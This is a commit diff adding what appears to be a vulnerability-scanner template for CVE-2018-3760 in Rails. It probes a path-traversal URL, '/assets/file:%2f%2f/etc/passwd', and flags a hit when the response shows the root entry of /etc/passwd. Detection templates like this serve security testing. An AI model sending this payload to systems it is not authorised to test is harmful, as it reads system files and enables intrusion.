commit
98d707c149
|
@ -0,0 +1,19 @@
|
||||||
|
id: cve-2018-3760
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Rails cve-2018-3760
|
||||||
|
author: 0xrudra
|
||||||
|
severity: high
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/assets/file:%2f%2f/etc/passwd"
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0:"
|
||||||
|
part: body
|
Loading…
Reference in New Issue